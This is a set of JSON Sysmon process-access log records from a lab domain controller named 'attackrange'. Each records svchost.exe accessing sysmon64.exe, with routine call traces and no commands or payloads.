{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1376,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1377,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1378,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1379,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1380,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1381,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1382,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1383,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
